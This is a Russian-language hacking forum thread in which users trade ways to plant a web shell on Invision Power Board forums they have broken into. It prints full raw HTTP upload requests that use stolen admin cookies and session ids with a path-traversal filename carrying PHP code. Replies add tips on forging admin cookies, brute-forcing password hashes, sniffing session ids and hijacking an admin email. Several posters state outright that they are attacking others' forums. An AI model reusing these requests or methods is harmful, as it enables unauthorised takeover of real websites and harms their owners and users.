Вот Я дошёл до того момента где нужно залить шелл :) прав на папке со смайлами конечно же не оказалось...

POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--

Всё понятно, но как указать локальный путь до файла, как он поймёт что Я именно хочу загрузить? :confused:

А если у тебя хэш cf20fc37b4g0be45c1336f29d444e798 и id то разве нельзя потделать куки вместо http запроса? и зайти админом ? :) Или я что то путаю?

Да это само собой, Я уже в админке, но мне не форум нужен :)

да я тоже взламываю форум и хочу болше как залит шелл ???????

аа.. всё торможу как всегда =) Да. Меня тоже вопрос волнует этот. Где пареметры на локальный адрес.. :confused:

Algol, пожалуйста, обрати внимание! =\

Ну просто много LOL!!!!!!!

Ага щас он вам поможет!!!! LOL!!!!!!! :D :D :D :D :D :D :D :D

Ну он же эту статью писал (про ipb1.3) он должен знать...

ну что никто неотвечает? Вообще последнее время что то нету активного народа не форуме....

Всё понятно, но как указать локальный путь до файла, как он поймёт что Я именно хочу загрузить? :confused:
Какой еще файл?? Вся отсылаемая на сервер информация УЖЕ содержится в HTTP-пакете.
А вот это <% echo("Hello from injected PHP script") %>
и есть сам скрипт, который ты заливаешь. Вместо приведенного, тебе естественно, нужно вставить текст шелла.

Рзве текст шела влезет в инеткряк?

Да стати когда ставиш относительный путь типа "../../my.php" то он файл не создает, хотя директория доступна на запись, сам выставлял права, т.е. естил на своем форуме.

Рзве текст шела влезет в инеткряк?
Свободно...

народ получил хэш захожу под админом все ок, а в admin.php нужен пароль, перебрал кучу словарей кароче кирдык, как можно в админку залесть зная хэш админa?

с этим скриптом выдает ошибку

id='description'>You must have administrative access to successfully log into the Invision Board Admin CP.<br>Please enter your forums username and password below<br><br><span style='color:red;font-weight:bold'>Could not retrieve session record</span></div> <!--IPB.ERROR--> <!--IPB.MESSAGE-->

прально ли я понял?

POST http*://site.com/forum/admin.php?adsess=ид сесия? HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http*://site.com/forum/admin.php?ид сесия?&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=ид админа;
pass_hash=тут понято;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

ид сесия?
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../forum/uploads/lol.php"
Content-Type: application/octet-stream

нада еще что то менять? и дальше где исходник шела нада с ковычками? или просто (исходинк)?

мдя =)
Этот путь указан неверно.
../../forum/uploads/lol.php

../../ <-это означает что файл заливается на 2 дириктории вниз (блеже к корневой)
допустим www.lol.ru/dir1/dir2/dir3/admin.php
находясь в админпхп чтобы залить файл в dir2 надо указать путь ../../upload_file
чтобы в dir1 то ../../../upload_file
Вот так если я нечего непутаю.

Второе у тебя нехватает самого аплоада

<% echo("php script") %>
-----------------------------7d43942c405bc--

без расшифровки пароля залить шелл не получится. Ты админский пароль расшифровал?

для этого он и подделывает запрос. чтобы хэш нерасшифровывать. тут может помешать только чмод.

для этого он и подделывает запрос. чтобы хэш нерасшифровывать. тут может помешать только чмод.

Нет, расшифрованный админский пароль все равно нужен. Иначе ты adsess не узнаешь

ну ептель тогда нет смысла париться с этими паками :\

для этого он и подделывает запрос. чтобы хэш нерасшифровывать. тут может помешать только чмод.
Если бы все так было просто... Я однажды хэш брутил месяц, потом понял что нет смысла. Зашел в последний раз под админскими куками, и увидел, что новое мыло вписывается без подтверждения пароля.. Бывают же такие приколисты :)
А так.. остается только брутить хэш. С одними куками не справишься.

BlackPrince
Мега респект за такую мазу!!! это реальная тема!

я так понял где я писал ид сесия нужен адсес? где такой взять? или можно как то снифером тоже украсть этот адсес?

блин такая беда где то в 5 форумом проник админами а пороли не расшифровываются :( подскажите как еще можно проникнуть в admin.php

народ а как узнать за чмодена папка или нет? узнал я адсес все без ошибок но не заливат, может путь не прально указал, на сайте так www.site.ru/forum/ а ставлю так ../../uploads/lol.php правильный этот путь? и я что-то не нашол где в админке можно включить чтоб заливались свои аватары =(

Вы вообще понимаете что именно происходит? :confused:


Вот прибавь к любому форуму это оканчание.

admin.php?adsess=


Вот появится верефикация твоего пассворда. Когда вставишь правильный пассворд, форум пошлёт на базу, проверит, если пассворд правильный, сгенерирует тебе НОВУЮ сессии, и только ТОГДА ты сможешь что небудь делать в Админке. Вот так работает.

А без этой новой сессии ты там нечиго зделать не сможешь.

ну я сам сижу в админке и копирую этот адсес, его принцып я понял, кода меняешь айпи тебя выкидывает с админки кода занаво заходиш то адсес меняется, тоесть адсес еще прикручен и к айпи и к паролю, но это все понятно не понятно одно как залить шелл?